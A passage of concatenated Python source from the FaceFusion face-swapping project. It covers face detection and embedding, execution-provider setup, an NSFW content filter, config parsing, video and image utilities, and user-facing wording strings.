bounding_box[2] / 2) * ratio_width, (bounding_box[1] + bounding_box[3] / 2) * ratio_height ])) face_landmark_5_raw[:, 0::3] = (face_landmark_5_raw[:, 0::3]) * ratio_width face_landmark_5_raw[:, 1::3] = (face_landmark_5_raw[:, 1::3]) * ratio_height for face_landmark_5 in face_landmark_5_raw: face_landmark_5_list.append(numpy.array(face_landmark_5.reshape(-1, 3)[:, :2])) score_list = score_raw.ravel().tolist() return bounding_box_list, face_landmark_5_list, score_list def detect_with_yunet(vision_frame : VisionFrame, face_detector_size : str) -> Tuple[List[BoundingBox], List[FaceLandmark5], List[Score]]: face_detector = get_face_analyser().get('face_detectors').get('yunet') face_detector_width, face_detector_height = unpack_resolution(face_detector_size) temp_vision_frame = resize_frame_resolution(vision_frame, (face_detector_width, face_detector_height)) ratio_height = vision_frame.shape[0] / temp_vision_frame.shape[0] ratio_width = vision_frame.shape[1] / temp_vision_frame.shape[1] bounding_box_list = [] face_landmark_5_list = [] score_list = [] face_detector.setInputSize((temp_vision_frame.shape[1], temp_vision_frame.shape[0])) face_detector.setScoreThreshold(facefusion.globals.face_detector_score) with thread_semaphore(): _, detections = face_detector.detect(temp_vision_frame) if numpy.any(detections): for detection in detections: bounding_box_list.append(numpy.array( [ detection[0] * ratio_width, detection[1] * ratio_height, (detection[0] + detection[2]) * ratio_width, (detection[1] + detection[3]) * ratio_height ])) face_landmark_5_list.append(detection[4:14].reshape((5, 2)) * [ ratio_width, ratio_height ]) score_list.append(detection[14]) return bounding_box_list, face_landmark_5_list, score_list def prepare_detect_frame(temp_vision_frame : VisionFrame, face_detector_size : str) -> VisionFrame: face_detector_width, face_detector_height = unpack_resolution(face_detector_size) detect_vision_frame = numpy.zeros((face_detector_height, face_detector_width, 3)) detect_vision_frame[:temp_vision_frame.shape[0], :temp_vision_frame.shape[1], :] = temp_vision_frame detect_vision_frame = (detect_vision_frame - 127.5) / 128.0 detect_vision_frame = numpy.expand_dims(detect_vision_frame.transpose(2, 0, 1), axis = 0).astype(numpy.float32) return detect_vision_frame def create_faces(vision_frame : VisionFrame, bounding_box_list : List[BoundingBox], face_landmark_5_list : List[FaceLandmark5], score_list : List[Score]) -> List[Face]: faces = [] if facefusion.globals.face_detector_score > 0: sort_indices = numpy.argsort(-numpy.array(score_list)) bounding_box_list = [ bounding_box_list[index] for index in sort_indices ] face_landmark_5_list = [face_landmark_5_list[index] for index in sort_indices] score_list = [ score_list[index] for index in sort_indices ] iou_threshold = 0.1 if facefusion.globals.face_detector_model == 'many' else 0.4 keep_indices = apply_nms(bounding_box_list, iou_threshold) for index in keep_indices: bounding_box = bounding_box_list[index] face_landmark_5_68 = face_landmark_5_list[index] face_landmark_68_5 = expand_face_landmark_68_from_5(face_landmark_5_68) face_landmark_68 = face_landmark_68_5 face_landmark_68_score = 0.0 if facefusion.globals.face_landmarker_score > 0: face_landmark_68, face_landmark_68_score = detect_face_landmark_68(vision_frame, bounding_box) if face_landmark_68_score > facefusion.globals.face_landmarker_score: face_landmark_5_68 = convert_face_landmark_68_to_5(face_landmark_68) landmarks : FaceLandmarkSet =\ { '5': face_landmark_5_list[index], '5/68': face_landmark_5_68, '68': face_landmark_68, '68/5': face_landmark_68_5 } scores : FaceScoreSet = \ { 'detector': score_list[index], 'landmarker': face_landmark_68_score } embedding, normed_embedding = calc_embedding(vision_frame, landmarks.get('5/68')) gender, age = detect_gender_age(vision_frame, bounding_box) faces.append(Face( bounding_box = bounding_box, landmarks = landmarks, scores = scores, embedding = embedding, normed_embedding = normed_embedding, gender = gender, age = age )) return faces def calc_embedding(temp_vision_frame : VisionFrame, face_landmark_5 : FaceLandmark5) -> Tuple[Embedding, Embedding]: face_recognizer = get_face_analyser().get('face_recognizer') crop_vision_frame, matrix = warp_face_by_face_landmark_5(temp_vision_frame, face_landmark_5, 'arcface_112_v2', (112, 112)) crop_vision_frame = crop_vision_frame / 127.5 - 1 crop_vision_frame = crop_vision_frame[:, :, ::-1].transpose(2, 0, 1).astype(numpy.float32) crop_vision_frame = numpy.expand_dims(crop_vision_frame, axis = 0) with conditional_thread_semaphore(facefusion.globals.execution_providers): embedding = face_recognizer.run(None, { face_recognizer.get_inputs()[0].name: crop_vision_frame })[0] embedding = embedding.ravel() normed_embedding = embedding / numpy.linalg.norm(embedding) return embedding, normed_embedding def detect_face_landmark_68(temp_vision_frame : VisionFrame, bounding_box : BoundingBox) -> Tuple[FaceLandmark68, Score]: face_landmarker = get_face_analyser().get('face_landmarkers').get('68') scale = 195 / numpy.subtract(bounding_box[2:], bounding_box[:2]).max() translation = (256 - numpy.add(bounding_box[2:], bounding_box[:2]) * scale) * 0.5 crop_vision_frame, affine_matrix = warp_face_by_translation(temp_vision_frame, translation, scale, (256, 256)) crop_vision_frame = cv2.cvtColor(crop_vision_frame, cv2.COLOR_RGB2Lab) if numpy.mean(crop_vision_frame[:, :, 0]) < 30: crop_vision_frame[:, :, 0] = cv2.createCLAHE(clipLimit = 2).apply(crop_vision_frame[:, :, 0]) crop_vision_frame = cv2.cvtColor(crop_vision_frame, cv2.COLOR_Lab2RGB) crop_vision_frame = crop_vision_frame.transpose(2, 0, 1).astype(numpy.float32) / 255.0 with conditional_thread_semaphore(facefusion.globals.execution_providers): face_landmark_68, face_heatmap = face_landmarker.run(None, { face_landmarker.get_inputs()[0].name: [ crop_vision_frame ] }) face_landmark_68 = face_landmark_68[:, :, :2][0] / 64 face_landmark_68 = face_landmark_68.reshape(1, -1, 2) * 256 face_landmark_68 = cv2.transform(face_landmark_68, cv2.invertAffineTransform(affine_matrix)) face_landmark_68 = face_landmark_68.reshape(-1, 2) face_landmark_68_score = numpy.amax(face_heatmap, axis = (2, 3)) face_landmark_68_score = numpy.mean(face_landmark_68_score) return face_landmark_68, face_landmark_68_score def expand_face_landmark_68_from_5(face_landmark_5 : FaceLandmark5) -> FaceLandmark68: face_landmarker = get_face_analyser().get('face_landmarkers').get('68_5') affine_matrix = estimate_matrix_by_face_landmark_5(face_landmark_5, 'ffhq_512', (1, 1)) face_landmark_5 = cv2.transform(face_landmark_5.reshape(1, -1, 2), affine_matrix).reshape(-1, 2) with conditional_thread_semaphore(facefusion.globals.execution_providers): face_landmark_68_5 = face_landmarker.run(None, { face_landmarker.get_inputs()[0].name: [ face_landmark_5 ] })[0][0] face_landmark_68_5 = cv2.transform(face_landmark_68_5.reshape(1, -1, 2), cv2.invertAffineTransform(affine_matrix)).reshape(-1, 2) return face_landmark_68_5 def detect_gender_age(temp_vision_frame : VisionFrame, bounding_box : BoundingBox) -> Tuple[int, int]: gender_age = get_face_analyser().get('gender_age') bounding_box = bounding_box.reshape(2, -1) scale = 64 / numpy.subtract(*bounding_box[::-1]).max() translation = 48 - bounding_box.sum(axis = 0) * scale * 0.5 crop_vision_frame, affine_matrix = warp_face_by_translation(temp_vision_frame, translation, scale, (96, 96)) crop_vision_frame = crop_vision_frame[:, :, ::-1].transpose(2, 0, 1).astype(numpy.float32) crop_vision_frame = numpy.expand_dims(crop_vision_frame, axis = 0) with conditional_thread_semaphore(facefusion.globals.execution_providers): prediction = gender_age.run(None, { gender_age.get_inputs()[0].name: crop_vision_frame })[0][0] gender = int(numpy.argmax(prediction[:2])) age = int(numpy.round(prediction[2] * 100)) return gender, age def get_one_face(vision_frame : VisionFrame, position : int = 0) -> Optional[Face]: many_faces = get_many_faces(vision_frame) if many_faces: try: return many_faces[position] except IndexError: return many_faces[-1] return None def get_average_face(vision_frames : List[VisionFrame], position : int = 0) -> Optional[Face]: average_face = None faces = [] embedding_list = [] normed_embedding_list = [] for vision_frame in vision_frames: face = get_one_face(vision_frame, position) if face: faces.append(face) embedding_list.append(face.embedding) normed_embedding_list.append(face.normed_embedding) if faces: first_face = get_first(faces) average_face = Face( bounding_box = first_face.bounding_box, landmarks = first_face.landmarks, scores = first_face.scores, embedding = numpy.mean(embedding_list, axis = 0), normed_embedding = numpy.mean(normed_embedding_list, axis = 0), gender = first_face.gender, age = first_face.age ) return average_face def get_many_faces(vision_frame : VisionFrame) -> List[Face]: faces = [] try: faces_cache = get_static_faces(vision_frame) if faces_cache: faces = faces_cache else: bounding_box_list = [] face_landmark_5_list = [] score_list = [] if facefusion.globals.face_detector_model in [ 'many', 'retinaface']: bounding_box_list_retinaface, face_landmark_5_list_retinaface, score_list_retinaface = detect_with_retinaface(vision_frame, facefusion.globals.face_detector_size) bounding_box_list.extend(bounding_box_list_retinaface) face_landmark_5_list.extend(face_landmark_5_list_retinaface) score_list.extend(score_list_retinaface) if facefusion.globals.face_detector_model in [ 'many', 'scrfd' ]: bounding_box_list_scrfd, face_landmark_5_list_scrfd, score_list_scrfd = detect_with_scrfd(vision_frame, facefusion.globals.face_detector_size) bounding_box_list.extend(bounding_box_list_scrfd) face_landmark_5_list.extend(face_landmark_5_list_scrfd) score_list.extend(score_list_scrfd) if facefusion.globals.face_detector_model in [ 'many', 'yoloface' ]: bounding_box_list_yoloface, face_landmark_5_list_yoloface, score_list_yoloface = detect_with_yoloface(vision_frame, facefusion.globals.face_detector_size) bounding_box_list.extend(bounding_box_list_yoloface) face_landmark_5_list.extend(face_landmark_5_list_yoloface) score_list.extend(score_list_yoloface) if facefusion.globals.face_detector_model in [ 'yunet' ]: bounding_box_list_yunet, face_landmark_5_list_yunet, score_list_yunet = detect_with_yunet(vision_frame, facefusion.globals.face_detector_size) bounding_box_list.extend(bounding_box_list_yunet) face_landmark_5_list.extend(face_landmark_5_list_yunet) score_list.extend(score_list_yunet) if bounding_box_list and face_landmark_5_list and score_list: faces = create_faces(vision_frame, bounding_box_list, face_landmark_5_list, score_list) if faces: set_static_faces(vision_frame, faces) if facefusion.globals.face_analyser_order: faces = sort_by_order(faces, facefusion.globals.face_analyser_order) if facefusion.globals.face_analyser_age: faces = filter_by_age(faces, facefusion.globals.face_analyser_age) if facefusion.globals.face_analyser_gender: faces = filter_by_gender(faces, facefusion.globals.face_analyser_gender) except (AttributeError, ValueError): pass return faces def find_similar_faces(reference_faces : FaceSet, vision_frame : VisionFrame, face_distance : float) -> List[Face]: similar_faces : List[Face] = [] many_faces = get_many_faces(vision_frame) if reference_faces: for reference_set in reference_faces: if not similar_faces: for reference_face in reference_faces[reference_set]: for face in many_faces: if compare_faces(face, reference_face, face_distance): similar_faces.append(face) return similar_faces def compare_faces(face : Face, reference_face : Face, face_distance : float) -> bool: current_face_distance = calc_face_distance(face, reference_face) return current_face_distance < face_distance def calc_face_distance(face : Face, reference_face : Face) -> float: if hasattr(face, 'normed_embedding') and hasattr(reference_face, 'normed_embedding'): return 1 - numpy.dot(face.normed_embedding, reference_face.normed_embedding) return 0 def sort_by_order(faces : List[Face], order : FaceAnalyserOrder) -> List[Face]: if order == 'left-right': return sorted(faces, key = lambda face: face.bounding_box[0]) if order == 'right-left': return sorted(faces, key = lambda face: face.bounding_box[0], reverse = True) if order == 'top-bottom': return sorted(faces, key = lambda face: face.bounding_box[1]) if order == 'bottom-top': return sorted(faces, key = lambda face: face.bounding_box[1], reverse = True) if order == 'small-large': return sorted(faces, key = lambda face: (face.bounding_box[2] - face.bounding_box[0]) * (face.bounding_box[3] - face.bounding_box[1])) if order == 'large-small': return sorted(faces, key = lambda face: (face.bounding_box[2] - face.bounding_box[0]) * (face.bounding_box[3] - face.bounding_box[1]), reverse = True) if order == 'best-worst': return sorted(faces, key = lambda face: face.scores.get('detector'), reverse = True) if order == 'worst-best': return sorted(faces, key = lambda face: face.scores.get('detector')) return faces def filter_by_age(faces : List[Face], age : FaceAnalyserAge) -> List[Face]: filter_faces = [] for face in faces: if categorize_age(face.age) == age: filter_faces.append(face) return filter_faces def filter_by_gender(faces : List[Face], gender : FaceAnalyserGender) -> List[Face]: filter_faces = [] for face in faces: if categorize_gender(face.gender) == gender: filter_faces.append(face) return filter_faces File: facefusion/execution.py from typing import List, Any from functools import lru_cache import subprocess import xml.etree.ElementTree as ElementTree import onnxruntime from facefusion.typing import ExecutionDevice, ValueAndUnit def encode_execution_providers(execution_providers : List[str]) -> List[str]: return [ execution_provider.replace('ExecutionProvider', '').lower() for execution_provider in execution_providers ] def decode_execution_providers(execution_providers : List[str]) -> List[str]: available_execution_providers = onnxruntime.get_available_providers() encoded_execution_providers = encode_execution_providers(available_execution_providers) return [ execution_provider for execution_provider, encoded_execution_provider in zip(available_execution_providers, encoded_execution_providers) if any(execution_provider in encoded_execution_provider for execution_provider in execution_providers) ] def has_execution_provider(execution_provider : str) -> bool: return execution_provider in onnxruntime.get_available_providers() def apply_execution_provider_options(execution_device_id : str, execution_providers : List[str]) -> List[Any]: execution_providers_with_options : List[Any] = [] for execution_provider in execution_providers: if execution_provider == 'CUDAExecutionProvider': execution_providers_with_options.append((execution_provider, { 'device_id': execution_device_id, 'cudnn_conv_algo_search': 'EXHAUSTIVE' if use_exhaustive() else 'DEFAULT' })) elif execution_provider == 'OpenVINOExecutionProvider': execution_providers_with_options.append((execution_provider, { 'device_id': execution_device_id, 'device_type': execution_device_id + '_FP32' })) elif execution_provider in [ 'DmlExecutionProvider', 'ROCMExecutionProvider' ]: execution_providers_with_options.append((execution_provider, { 'device_id': execution_device_id })) else: execution_providers_with_options.append(execution_provider) return execution_providers_with_options def use_exhaustive() -> bool: execution_devices = detect_static_execution_devices() product_names = ('GeForce GTX 1630', 'GeForce GTX 1650', 'GeForce GTX 1660') return any(execution_device.get('product').get('name').startswith(product_names) for execution_device in execution_devices) def run_nvidia_smi() -> subprocess.Popen[bytes]: commands = [ 'nvidia-smi', '--query', '--xml-format' ] return subprocess.Popen(commands, stdout = subprocess.PIPE) @lru_cache(maxsize = None) def detect_static_execution_devices() -> List[ExecutionDevice]: return detect_execution_devices() def detect_execution_devices() -> List[ExecutionDevice]: execution_devices : List[ExecutionDevice] = [] try: output, _ = run_nvidia_smi().communicate() root_element = ElementTree.fromstring(output) except Exception: root_element = ElementTree.Element('xml') for gpu_element in root_element.findall('gpu'): execution_devices.append( { 'driver_version': root_element.find('driver_version').text, 'framework': { 'name': 'CUDA', 'version': root_element.find('cuda_version').text }, 'product': { 'vendor': 'NVIDIA', 'name': gpu_element.find('product_name').text.replace('NVIDIA ', '') }, 'video_memory': { 'total': create_value_and_unit(gpu_element.find('fb_memory_usage/total').text), 'free': create_value_and_unit(gpu_element.find('fb_memory_usage/free').text) }, 'utilization': { 'gpu': create_value_and_unit(gpu_element.find('utilization/gpu_util').text), 'memory': create_value_and_unit(gpu_element.find('utilization/memory_util').text) } }) return execution_devices def create_value_and_unit(text : str) -> ValueAndUnit: value, unit = text.split() value_and_unit : ValueAndUnit =\ { 'value': value, 'unit': unit } return value_and_unit File: facefusion/content_analyser.py from typing import Any from functools import lru_cache from time import sleep import cv2 import numpy import onnxruntime from tqdm import tqdm import facefusion.globals from facefusion import process_manager, wording from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import VisionFrame, ModelSet, Fps from facefusion.execution import apply_execution_provider_options from facefusion.vision import get_video_frame, count_video_frame_total, read_image, detect_video_fps from facefusion.filesystem import resolve_relative_path, is_file from facefusion.download import conditional_download CONTENT_ANALYSER = None MODELS : ModelSet =\ { 'open_nsfw': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/open_nsfw.onnx', 'path': resolve_relative_path('../.assets/models/open_nsfw.onnx') } } PROBABILITY_LIMIT = 0.80 RATE_LIMIT = 10 STREAM_COUNTER = 0 def get_content_analyser() -> Any: global CONTENT_ANALYSER with thread_lock(): while process_manager.is_checking(): sleep(0.5) if CONTENT_ANALYSER is None: model_path = MODELS.get('open_nsfw').get('path') CONTENT_ANALYSER = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return CONTENT_ANALYSER def clear_content_analyser() -> None: global CONTENT_ANALYSER CONTENT_ANALYSER = None def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = MODELS.get('open_nsfw').get('url') model_path = MODELS.get('open_nsfw').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def analyse_stream(vision_frame : VisionFrame, video_fps : Fps) -> bool: global STREAM_COUNTER STREAM_COUNTER = STREAM_COUNTER + 1 if STREAM_COUNTER % int(video_fps) == 0: return analyse_frame(vision_frame) return False def analyse_frame(vision_frame : VisionFrame) -> bool: content_analyser = get_content_analyser() vision_frame = prepare_frame(vision_frame) with conditional_thread_semaphore(facefusion.globals.execution_providers): probability = content_analyser.run(None, { content_analyser.get_inputs()[0].name: vision_frame })[0][0][1] return probability > PROBABILITY_LIMIT def prepare_frame(vision_frame : VisionFrame) -> VisionFrame: vision_frame = cv2.resize(vision_frame, (224, 224)).astype(numpy.float32) vision_frame -= numpy.array([ 104, 117, 123 ]).astype(numpy.float32) vision_frame = numpy.expand_dims(vision_frame, axis = 0) return vision_frame @lru_cache(maxsize = None) def analyse_image(image_path : str) -> bool: frame = read_image(image_path) return analyse_frame(frame) @lru_cache(maxsize = None) def analyse_video(video_path : str, start_frame : int, end_frame : int) -> bool: video_frame_total = count_video_frame_total(video_path) video_fps = detect_video_fps(video_path) frame_range = range(start_frame or 0, end_frame or video_frame_total) rate = 0.0 counter = 0 with tqdm(total = len(frame_range), desc = wording.get('analysing'), unit = 'frame', ascii = ' =', disable = facefusion.globals.log_level in [ 'warn', 'error' ]) as progress: for frame_number in frame_range: if frame_number % int(video_fps) == 0: frame = get_video_frame(video_path, frame_number) if analyse_frame(frame): counter += 1 rate = counter * int(video_fps) / len(frame_range) * 100 progress.update() progress.set_postfix(rate = rate) return rate > RATE_LIMIT File: facefusion/config.py from configparser import ConfigParser from typing import Any, Optional, List import facefusion.globals CONFIG = None def get_config() -> ConfigParser: global CONFIG if CONFIG is None: CONFIG = ConfigParser() CONFIG.read(facefusion.globals.config_path, encoding = 'utf-8') return CONFIG def clear_config() -> None: global CONFIG CONFIG = None def get_str_value(key : str, fallback : Optional[str] = None) -> Optional[str]: value = get_value_by_notation(key) if value or fallback: return str(value or fallback) return None def get_int_value(key : str, fallback : Optional[str] = None) -> Optional[int]: value = get_value_by_notation(key) if value or fallback: return int(value or fallback) return None def get_float_value(key : str, fallback : Optional[str] = None) -> Optional[float]: value = get_value_by_notation(key) if value or fallback: return float(value or fallback) return None def get_bool_value(key : str, fallback : Optional[str] = None) -> Optional[bool]: value = get_value_by_notation(key) if value == 'True' or fallback == 'True': return True if value == 'False' or fallback == 'False': return False return None def get_str_list(key : str, fallback : Optional[str] = None) -> Optional[List[str]]: value = get_value_by_notation(key) if value or fallback: return [ str(value) for value in (value or fallback).split(' ') ] return None def get_int_list(key : str, fallback : Optional[str] = None) -> Optional[List[int]]: value = get_value_by_notation(key) if value or fallback: return [ int(value) for value in (value or fallback).split(' ') ] return None def get_float_list(key : str, fallback : Optional[str] = None) -> Optional[List[float]]: value = get_value_by_notation(key) if value or fallback: return [ float(value) for value in (value or fallback).split(' ') ] return None def get_value_by_notation(key : str) -> Optional[Any]: config = get_config() if '.' in key: section, name = key.split('.') if section in config and name in config[section]: return config[section][name] if key in config: return config[key] return None File: facefusion/metadata.py METADATA =\ { 'name': 'FaceFusion', 'description': 'Next generation face swapper and enhancer', 'version': '2.6.1', 'license': 'MIT', 'author': 'Henry Ruhs', 'url': 'https://facefusion.io' } def get(key : str) -> str: return METADATA[key] File: facefusion/vision.py from typing import Optional, List, Tuple from functools import lru_cache import cv2 import numpy from cv2.typing import Size from facefusion.common_helper import is_windows from facefusion.typing import VisionFrame, Resolution, Fps from facefusion.choices import image_template_sizes, video_template_sizes from facefusion.filesystem import is_image, is_video, sanitize_path_for_windows @lru_cache(maxsize = 128) def read_static_image(image_path : str) -> Optional[VisionFrame]: return read_image(image_path) def read_static_images(image_paths : List[str]) -> Optional[List[VisionFrame]]: frames = [] if image_paths: for image_path in image_paths: frames.append(read_static_image(image_path)) return frames def read_image(image_path : str) -> Optional[VisionFrame]: if is_image(image_path): if is_windows(): image_path = sanitize_path_for_windows(image_path) return cv2.imread(image_path) return None def write_image(image_path : str, vision_frame : VisionFrame) -> bool: if image_path: if is_windows(): image_path = sanitize_path_for_windows(image_path) return cv2.imwrite(image_path, vision_frame) return False def detect_image_resolution(image_path : str) -> Optional[Resolution]: if is_image(image_path): image = read_image(image_path) height, width = image.shape[:2] return width, height return None def restrict_image_resolution(image_path : str, resolution : Resolution) -> Resolution: if is_image(image_path): image_resolution = detect_image_resolution(image_path) if image_resolution < resolution: return image_resolution return resolution def create_image_resolutions(resolution : Resolution) -> List[str]: resolutions = [] temp_resolutions = [] if resolution: width, height = resolution temp_resolutions.append(normalize_resolution(resolution)) for template_size in image_template_sizes: temp_resolutions.append(normalize_resolution((width * template_size, height * template_size))) temp_resolutions = sorted(set(temp_resolutions)) for temp_resolution in temp_resolutions: resolutions.append(pack_resolution(temp_resolution)) return resolutions def get_video_frame(video_path : str, frame_number : int = 0) -> Optional[VisionFrame]: if is_video(video_path): if is_windows(): video_path = sanitize_path_for_windows(video_path) video_capture = cv2.VideoCapture(video_path) if video_capture.isOpened(): frame_total = video_capture.get(cv2.CAP_PROP_FRAME_COUNT) video_capture.set(cv2.CAP_PROP_POS_FRAMES, min(frame_total, frame_number - 1)) has_vision_frame, vision_frame = video_capture.read() video_capture.release() if has_vision_frame: return vision_frame return None def count_video_frame_total(video_path : str) -> int: if is_video(video_path): if is_windows(): video_path = sanitize_path_for_windows(video_path) video_capture = cv2.VideoCapture(video_path) if video_capture.isOpened(): video_frame_total = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT)) video_capture.release() return video_frame_total return 0 def detect_video_fps(video_path : str) -> Optional[float]: if is_video(video_path): if is_windows(): video_path = sanitize_path_for_windows(video_path) video_capture = cv2.VideoCapture(video_path) if video_capture.isOpened(): video_fps = video_capture.get(cv2.CAP_PROP_FPS) video_capture.release() return video_fps return None def restrict_video_fps(video_path : str, fps : Fps) -> Fps: if is_video(video_path): video_fps = detect_video_fps(video_path) if video_fps < fps: return video_fps return fps def detect_video_resolution(video_path : str) -> Optional[Resolution]: if is_video(video_path): if is_windows(): video_path = sanitize_path_for_windows(video_path) video_capture = cv2.VideoCapture(video_path) if video_capture.isOpened(): width = video_capture.get(cv2.CAP_PROP_FRAME_WIDTH) height = video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT) video_capture.release() return int(width), int(height) return None def restrict_video_resolution(video_path : str, resolution : Resolution) -> Resolution: if is_video(video_path): video_resolution = detect_video_resolution(video_path) if video_resolution < resolution: return video_resolution return resolution def create_video_resolutions(resolution : Resolution) -> List[str]: resolutions = [] temp_resolutions = [] if resolution: width, height = resolution temp_resolutions.append(normalize_resolution(resolution)) for template_size in video_template_sizes: if width > height: temp_resolutions.append(normalize_resolution((template_size * width / height, template_size))) else: temp_resolutions.append(normalize_resolution((template_size, template_size * height / width))) temp_resolutions = sorted(set(temp_resolutions)) for temp_resolution in temp_resolutions: resolutions.append(pack_resolution(temp_resolution)) return resolutions def normalize_resolution(resolution : Tuple[float, float]) -> Resolution: width, height = resolution if width and height: normalize_width = round(width / 2) * 2 normalize_height = round(height / 2) * 2 return normalize_width, normalize_height return 0, 0 def pack_resolution(resolution : Resolution) -> str: width, height = normalize_resolution(resolution) return str(width) + 'x' + str(height) def unpack_resolution(resolution : str) -> Resolution: width, height = map(int, resolution.split('x')) return width, height def resize_frame_resolution(vision_frame : VisionFrame, max_resolution : Resolution) -> VisionFrame: height, width = vision_frame.shape[:2] max_width, max_height = max_resolution if height > max_height or width > max_width: scale = min(max_height / height, max_width / width) new_width = int(width * scale) new_height = int(height * scale) return cv2.resize(vision_frame, (new_width, new_height)) return vision_frame def normalize_frame_color(vision_frame : VisionFrame) -> VisionFrame: return cv2.cvtColor(vision_frame, cv2.COLOR_BGR2RGB) def create_tile_frames(vision_frame : VisionFrame, size : Size) -> Tuple[List[VisionFrame], int, int]: vision_frame = numpy.pad(vision_frame, ((size[1], size[1]), (size[1], size[1]), (0, 0))) tile_width = size[0] - 2 * size[2] pad_size_bottom = size[2] + tile_width - vision_frame.shape[0] % tile_width pad_size_right = size[2] + tile_width - vision_frame.shape[1] % tile_width pad_vision_frame = numpy.pad(vision_frame, ((size[2], pad_size_bottom), (size[2], pad_size_right), (0, 0))) pad_height, pad_width = pad_vision_frame.shape[:2] row_range = range(size[2], pad_height - size[2], tile_width) col_range = range(size[2], pad_width - size[2], tile_width) tile_vision_frames = [] for row_vision_frame in row_range: top = row_vision_frame - size[2] bottom = row_vision_frame + size[2] + tile_width for column_vision_frame in col_range: left = column_vision_frame - size[2] right = column_vision_frame + size[2] + tile_width tile_vision_frames.append(pad_vision_frame[top:bottom, left:right, :]) return tile_vision_frames, pad_width, pad_height def merge_tile_frames(tile_vision_frames : List[VisionFrame], temp_width : int, temp_height : int, pad_width : int, pad_height : int, size : Size) -> VisionFrame: merge_vision_frame = numpy.zeros((pad_height, pad_width, 3)).astype(numpy.uint8) tile_width = tile_vision_frames[0].shape[1] - 2 * size[2] tiles_per_row = min(pad_width // tile_width, len(tile_vision_frames)) for index, tile_vision_frame in enumerate(tile_vision_frames): tile_vision_frame = tile_vision_frame[size[2]:-size[2], size[2]:-size[2]] row_index = index // tiles_per_row col_index = index % tiles_per_row top = row_index * tile_vision_frame.shape[0] bottom = top + tile_vision_frame.shape[0] left = col_index * tile_vision_frame.shape[1] right = left + tile_vision_frame.shape[1] merge_vision_frame[top:bottom, left:right, :] = tile_vision_frame merge_vision_frame = merge_vision_frame[size[1] : size[1] + temp_height, size[1]: size[1] + temp_width, :] return merge_vision_frame File: facefusion/memory.py from facefusion.common_helper import is_macos, is_windows if is_windows(): import ctypes else: import resource def limit_system_memory(system_memory_limit : int = 1) -> bool: if is_macos(): system_memory_limit = system_memory_limit * (1024 ** 6) else: system_memory_limit = system_memory_limit * (1024 ** 3) try: if is_windows(): ctypes.windll.kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(system_memory_limit), ctypes.c_size_t(system_memory_limit)) #type:ignore[attr-defined] else: resource.setrlimit(resource.RLIMIT_DATA, (system_memory_limit, system_memory_limit)) return True except Exception: return False File: facefusion/wording.py from typing import Any, Dict, Optional WORDING : Dict[str, Any] =\ { 'conda_not_activated': 'Conda is not activated', 'python_not_supported': 'Python version is not supported, upgrade to {version} or higher', 'ffmpeg_not_installed': 'FFMpeg is not installed', 'creating_temp': 'Creating temporary resources', 'extracting_frames': 'Extracting frames with a resolution of {resolution} and {fps} frames per second', 'extracting_frames_succeed': 'Extracting frames succeed', 'extracting_frames_failed': 'Extracting frames failed', 'analysing': 'Analysing', 'processing': 'Processing', 'downloading': 'Downloading', 'temp_frames_not_found': 'Temporary frames not found', 'copying_image': 'Copying image with a resolution of {resolution}', 'copying_image_succeed': 'Copying image succeed', 'copying_image_failed': 'Copying image failed', 'finalizing_image': 'Finalizing image with a resolution of {resolution}', 'finalizing_image_succeed': 'Finalizing image succeed', 'finalizing_image_skipped': 'Finalizing image skipped', 'merging_video': 'Merging video with a resolution of {resolution} and {fps} frames per second', 'merging_video_succeed': 'Merging video succeed', 'merging_video_failed': 'Merging video failed', 'skipping_audio': 'Skipping audio', 'restoring_audio_succeed': 'Restoring audio succeed', 'restoring_audio_skipped': 'Restoring audio skipped', 'clearing_temp': 'Clearing temporary resources', 'processing_stopped': 'Processing stopped', 'processing_image_succeed': 'Processing to image succeed in {seconds} seconds', 'processing_image_failed': 'Processing to image failed', 'processing_video_succeed': 'Processing to video succeed in {seconds} seconds', 'processing_video_failed': 'Processing to video failed', 'model_download_not_done': 'Download of the model is not done', 'model_file_not_present': 'File of the model is not present', 'select_image_source': 'Select a image for source path', 'select_audio_source': 'Select a audio for source path', 'select_video_target': 'Select a video for target path', 'select_image_or_video_target': 'Select a image or video for target path', 'select_file_or_directory_output': 'Select a file or directory for output path', 'no_source_face_detected': 'No source face detected', 'frame_processor_not_loaded': 'Frame processor {frame_processor} could not be loaded', 'frame_processor_not_implemented': 'Frame processor {frame_processor} not implemented correctly', 'ui_layout_not_loaded': 'UI layout {ui_layout} could not be loaded', 'ui_layout_not_implemented': 'UI layout {ui_layout} not implemented correctly', 'stream_not_loaded': 'Stream {stream_mode} could not be loaded', 'point': '.', 'comma': ',', 'colon': ':', 'question_mark': '?', 'exclamation_mark': '!', 'help': { # installer 'install_dependency': 'select the variant of {dependency} to install', 'skip_conda': 'skip the conda environment check', # general 'config': 'choose the config file to override defaults', 'source': 'choose single or multiple source images or audios', 'target': 'choose single target image or video', 'output': 'specify the output file or directory', # misc 'force_download': 'force automate downloads and exit', 'skip_download': 'omit automate downloads and remote lookups', 'headless': 'run the program without a user interface', 'log_level': 'adjust the message severity displayed in the terminal', # execution 'execution_device_id': 'specify the device used for processing', 'execution_providers': 'accelerate the model inference using different providers (choices: {choices}, ...)', 'execution_thread_count': 'specify the amount of parallel threads while processing', 'execution_queue_count': 'specify the amount of frames each thread is processing', # memory 'video_memory_strategy': 'balance fast frame processing and low VRAM usage', 'system_memory_limit': 'limit the available RAM that can be used while processing', # face analyser 'face_analyser_order': 'specify the order in which the face analyser detects faces', 'face_analyser_age': 'filter the detected faces based on their age', 'face_analyser_gender': 'filter the detected faces based on their gender', 'face_detector_model': 'choose the model responsible for detecting the face', 'face_detector_size': 'specify the size of the frame provided to the face detector', 'face_detector_score': 'filter the detected faces base on the confidence score', 'face_landmarker_score': 'filter the detected landmarks base on the confidence score', # face selector 'face_selector_mode': 'use reference based tracking or simple matching', 'reference_face_position': 'specify the position used to create the reference face', 'reference_face_distance': 'specify the desired similarity between the reference face and target face', 'reference_frame_number': 'specify the frame used to create the reference face', # face mask 'face_mask_types': 'mix and match different face mask types (choices: {choices})', 'face_mask_blur': 'specify the degree of 